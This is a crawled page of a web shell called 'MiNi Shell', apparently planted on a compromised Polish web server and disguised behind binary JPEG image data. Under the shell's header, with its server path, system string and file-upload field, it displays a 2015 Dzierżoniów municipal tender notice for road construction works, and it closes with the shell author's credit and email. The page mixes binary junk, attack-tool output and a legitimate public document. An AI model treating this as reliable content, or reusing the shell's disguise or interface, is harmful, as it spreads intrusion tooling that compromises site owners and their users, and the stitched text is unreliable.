JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151222/350068-N-2015.html

<p class="kh_header"><b>Dzierżoniów: Wykonanie robót budowlanych dotyczących realizacji zadania pn.: Budowa drogi - łącznika na os. Błękitnym od żłobka do budynku nr 12 oraz przebudowa ulicy 
od ul. Korczaka do SP nr 5 w mieście Dzierżoniów</b><br>
<b>Numer ogłoszenia: 350068 - 2015; data zamieszczenia: 22.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 6450800, faks 74 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um.dzierzoniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dotyczących realizacji zadania pn.: Budowa drogi - łącznika na os. Błękitnym od żłobka do budynku nr 12 oraz przebudowa ulicy 
od ul. Korczaka do SP nr 5 w mieście Dzierżoniów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje roboty:
W branży drogowej: 
Długość drogi 322,5 m w tym: Etap 1 - 113 m, Etap 2 - 116,5 m, Etap 3 - 93 m.
a) Usunięcie kolidującej zieleni (drzew, żywopłotów) w zakresie i zgodnie z decyzją Starosty Dzierżoniowskiego nr RL.613.2.2015 z dnia 29.01.2015r. oraz dokonanie nowych nasadzeń zgodnie z pkt. 6 tej decyzji na działce 41/9 drzew iglastych typu świerk conica o wysokości  ok. 70 cm.
b)Sfrezowanie warstwy bitumicznej istniejącej jezdni gr. od 8-10 cm, wraz z rozbiórką istniejących betonowych krawężników. c)Rozbiórkę istniejących nawierzchni  chodników wraz z betonowymi obrzeżami. d)Wykonanie  korytowania. e)Likwidacja poprzez demontaż i wywiezienie na wysypisko śmieci wyposażenia placu zabaw. f)Ustawienie nowych krawężników betonowych na ławie betonowej  z oporem.  g)Wykonanie przebudowy  drogi na odcinku: od ul. Korczaka do parkingu przy Szkole Podstawowej nr 5 z jezdnią szerokości 5,00 m. Warstwa ścieralna z betonu asfaltowego gr. 4 cm. Na odcinku od parkingu przy Szkole Podstawowej nr 5 do Przedszkola Niepublicznego nr 3 droga o nawierzchni z kostki betonowej  gr. 8 cm. h) Wykonanie nowej konstrukcji i nawierzchni chodników o zmiennej szer. 1,50-3,00 m z kostki betonowej  gr. 8 cm. i) Wykonanie miejsc postojowych z kostki kamiennej (kostka z odzysku) oraz z kostki betonowej  gr.8 cm. j) Wykonanie terenów zielonych.
k) Wykonanie robót  związanych z połączeniem przebudowywanej drogi, chodników i łącznika             z istniejącymi, sąsiadującymi ulicami, chodnikami, zjazdami, dojściami do budynków itp. W przypadku ingerencji w obiekty przyległe należy uwzględnić ich naprawę, uzupełnienie itp.  l) Wprowadzenie na poszczególnych etapach robót czasowej organizacji ruchu. m)Wprowadzenie po zakończeniu poszczególnych etapów stałej organizacji ruchu przez wykonanie nowego oznakowania pionowego oraz poziomego gruboziarnistego zgodnie z projektem.
 W branży instalacyjnej: 
a)Regulację i wymianę istniejących wpustów deszczowych. b) Wykonanie odwodnienia łącznika. c) Wymianę włazów, pokryw i pierścieni odciążających istniejących studni kanalizacji deszczowej i sanitarnej znajdujących się na przebudowywanym odcinku drogi i na nowo budowanym łączniku. d) Wyregulowanie do zaprojektowanych rzędnych wszystkich urządzeń podziemnych 
(zasuw, zaworów itp.) znajdujących się w pasie realizowanych nawierzchni. W branży elektrycznej: 
a)Demontaż słupów oświetleniowych wraz z oprawami. b) Montaż nowych słupów oświetleniowych wraz z oprawami. c)Wymiana kabla oświetlenie drogowego. 2. Roboty budowlane należy wykonać zgodnie z dokumentacją projektową oraz specyfikacją techniczną wykonania i odbioru robót budowlanych. Szczegółowy zakres robót określają: 
a) Projekt Budowlany pn. Przebudowa drogi od ul. Korczaka do Szkoły Podstawowej nr 5 wraz             z budową łącznika drogowego na os. Błękitnym  branża: drogowa i sanitarna. Projektant   inż. Eugeniusz Piłat. Zamawiający zastrzega, że etapy realizacji określone  w punkt 4.1 Opisu Technicznego (str. 3) otrzymują brzmienie jak w punkcie 4 projektu wykonawczego str. 6. Ponadto skreśla się zapis projektu budowlanego punkt 4.1 od wyrazów Ponieważ istniejąca. do zaprojektowanej niwelety (str.24). b) Projekt Wykonawczy pn. Przebudowa drogi od ul. Korczaka do Szkoły Podstawowej nr 5 wraz z budową łącznika drogowego na os. Błękitnym branża: drogowa i sanitarna. Projektant  inż. Eugeniusz Piłat. c)Projekt Wykonawczy  pn.  Przebudowa drogi od ul. Korczaka do Szkoły Podstawowej nr 5 wraz z budową łącznika drogowego na os. Błękitnym  branża: elektryczna (przebudowa istniejącego oświetlenia ulicznego). Projektant inż. Marek Uss.  d) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych pn. Przebudowa drogi od ul. Korczaka do Szkoły Podstawowej nr 5 wraz z budową łącznika drogowego na os. Błękitnym  branża: drogowa i sanitarna. Projektant  inż. Eugeniusz Piłat. Zamawiający skreśla w pkt. 5.2 zdanie zaczynające się od wyrazów Fragment ogrodzenia . do wymienionego w punkcie 3.2 (str. 14). Ponadto w pkt. 5.2 w zdaniu Pod projektowanymi chodnikami i ścieżką rowerową maksymalna głębokość wynosi 0,4m i otrzymuje brzmienie Pod projektowanymi chodnikami maksymalna głębokość wynosi 0,4m (str. 18). e) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych pn.  Przebudowa drogi od ul. Korczaka do Szkoły Podstawowej nr 5 wraz z budową łącznika drogowego na os. Błękitnym branża: elektryczna (przebudowa istniejącego oświetlenia ulicznego). Projektant inż. Marek Uss.  f) Projekt czasowej organizacji ruchu pn. Przebudowa drogi od ul. Korczaka do Szkoły Podstawowej nr 5 wraz z budową łącznika drogowego na os. Błękitnym. Projektant inż. Eugeniusz Piłat. g) Projekt docelowej organizacji ruchu pn.  Przebudowa drogi od ul. Korczaka do Szkoły Podstawowej nr 5 wraz z budową łącznika drogowego na os. Błękitnym. Projektant inż. Eugeniusz Piłat. 3. Wykonawca,  oprócz obowiązków wynikających z pkt. 1, zobowiązuje się do: 1) Przejęcia terenu budowy, jego zabezpieczenia i należytego utrzymania; 2)Zapewnienia dojść i dojazdów do posesji zlokalizowanych w obrębie inwestycji; 3)Organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników, 4) Udostępnienia terenu budowy dla WiK Sp. z o.o. i innych właścicieli sieci, celem realizacji przez nich robót w zakresie wymiany sieci; 5) Wystąpienia do gestorów sieci o protokolarne przekazanie urządzeń na czas prowadzenia robót, a po zakończeniu prac protokolarne przekazanie ich właścicielom; 6)Zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę; 7) Wyczyszczenia nawierzchni przyległych dróg w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń technicznych; 8)Uporządkowania terenu budowy i terenu przyległego po zakończeniu robót; 9) Wywozu materiału i gruzu z rozbiórki na składowisko odpadów; 10) Przekazania Zamawiającemu sfrezowanej warstwy bitumicznej z przebudowywanego odcinka pasa drogowego wraz przetransportowaniem jej na plac przy Cmentarzu Komunalnym w Dzierżoniowie - odl. ok. 3 km; 11) Wywozu pochodzących z rozbiórki mas mineralno-bitumicznych i ich utylizacji, których nie przyjmie Zamawiający; 12) Obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF); 13) Realizacji i poniesienia wszelkich kosztów związanych z wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień; 14) Wykonania badań i pomiarów w czasie wykonywania robót budowlanych oraz badań odbiorczych zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych; 15) Przedłożenia Zamawiającemu w dniu podpisania umowy dokumentów wynikających ze SIWZ punkt XIV; 16) Dostarczenia Zamawiającemu oświadczenia kierownika budowy o przeszkoleniu                             w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy; 17) Dostarczenia, przed wbudowaniem, recepty na masę celem jej zatwierdzenia przez Zamawiającego; w przypadku wbudowania materiału bez stosownej akceptacji, Zamawiający nie dokona zapłaty za jej wbudowanie; 18) Przekazania Zamawiającemu oświadczeń o podjęciu obowiązków przez kierownika budowy i kierownika robót sanitarnych i kierownika robót elektrycznych w terminie 3 dni od daty podpisania umowy; 19) Uczestnictwa kierownika budowy w cotygodniowych radach budowy, na których m.in. będzie kontrolowane stosowanie wymogów związanych z ochroną środowiska i BHP; informacyjnie podaje się, że Urząd wdrożył normę m.in. środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004. 4. W przypadku, gdy w projektach budowlanych i wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one realizację robót w zgodzie z Prawem budowlanym i odpowiednimi normami, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych                                         w w/w dokumentacji oraz zostaną one wcześniej zaakceptowane przez Zamawiającego. Zamawiający dopuszcza możliwość wykonania przedmiotu zamówienia z innymi materiałami i urządzeniami równoważnymi, a za ofertę równoważną Zamawiający uzna przyjęcie parametrów technicznych pod warunkiem, że materiały i urządzenia oferowane przez Wykonawcę jako równoważne spełnią wymagania określone przez Zamawiającego w SIWZ, projektach budowlanych i wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych. Zamawiający informuje, że podane w projektach budowlanych konkretne propozycje materiałów i urządzeń mają na celu wyłącznie określenie standardu wykonania lub przyjętego rozwiązania i mogą być zastąpione rozwiązaniami równoważnymi nie powodującymi zmiany ilości i jakości wyspecyfikowanych urządzeń i materiałów. Zamawiający dopuszcza rozwiązania równoważne, ale na podstawie art. 30 ust. 5 ustawy  to na Wykonawcy spoczywa obowiązek wykazania na etapie składania ofert, że oferowane przez niego materiały i urządzenia spełniają wymagania określone przez Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.24.00-6, 45.23.14.00-9, 45.11.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazać w załączniku nr 4 do SIWZ roboty budowlane wykonane 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert 
w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, 
z podaniem ich rodzaju i wartości, daty i miejsca wykonania 
oraz załączyć dowody dotyczące wykonania:
a) min. 3 robót w zakresie budowy, przebudowy lub remontu dróg o nawierzchni z betonu asfaltowego lub mas mineralno-asfaltowych SMA na powierzchni minimum 1200 m2 każda z robót;
b) min. 3 robót w zakresie budowy, przebudowy, remontu dróg, chodników, parkingów                  o nawierzchni z kostki betonowej, na powierzchni minimum 800 m2  każda z robót;
określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazać w załączniku nr 5 do SIWZ osoby, które będą uczestniczyć w wykonywaniu zamówienia,                  w szczególności odpowiedzialnych za kierowanie robotami budowlanymi w specjalności:
a)	drogowej;
b)	instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych;
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                  i elektroenergetycznych;
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami 
oraz 
złożenie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia - poprzez wypełnienie i podpisanie załącznika 
nr 5 do SIWZ.
Ocena spełnienia warunku wymaganego od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94</li>
<li>2 - Okres Gwaranacji - 6</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy:
1)	W zakresie terminu i wynagrodzenia:
a)	w przypadku błędów lub braków projektowych (z winy projektanta lub nie) jest konieczna zmiana technologii wykonania robót budowlanych bądź wykonania zamówień dodatkowych warunkujących wykonanie zamówienia podstawowego, by obiekt mógł spełniać swoje przeznaczenie, 
b)	z powodu działania okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć                 w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
c)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
2)	W przypadku wystąpienia robót zamiennych dopuszcza się zmianę umowy
 w zakresie terminu wykonania, wynagrodzenia w sytuacji gdy wystąpi:
a)	podniesienie bezpieczeństwa,
b)	materiały budowlane przewidziane w umowie do wykonania zamówienia nie mogą być użyte przy realizacji inwestycji z powodu zaprzestania ich produkcji lub konieczności zastąpienia innymi,
c)	w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa budowlanego, 
d)	w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa mająca wpływ na opisany przedmiot zamówienia,
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminu lub wynagrodzenia Wykonawca winien jest poinformować Zamawiającego i uzyskać jego zgodę. 
Strony z powodów, jakie mogą wpływać na zmianę terminu wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót                  w miejscu budowy.
3)	W przypadku wystąpienia z wnioskiem Wykonawcy  w sprawie zlecenia części robót                w ramach podwykonawstwa, gdy nie były one określone w Jego ofercie, w tym zakresie wymagana jest zgoda Zamawiającego zgodnie z zapisami projektu umowy. Wprowadzenie podwykonawcy nie ma wpływu na zmianę terminu i wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/Article/id,1348.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiajacego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.01.2016 godzina 10:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com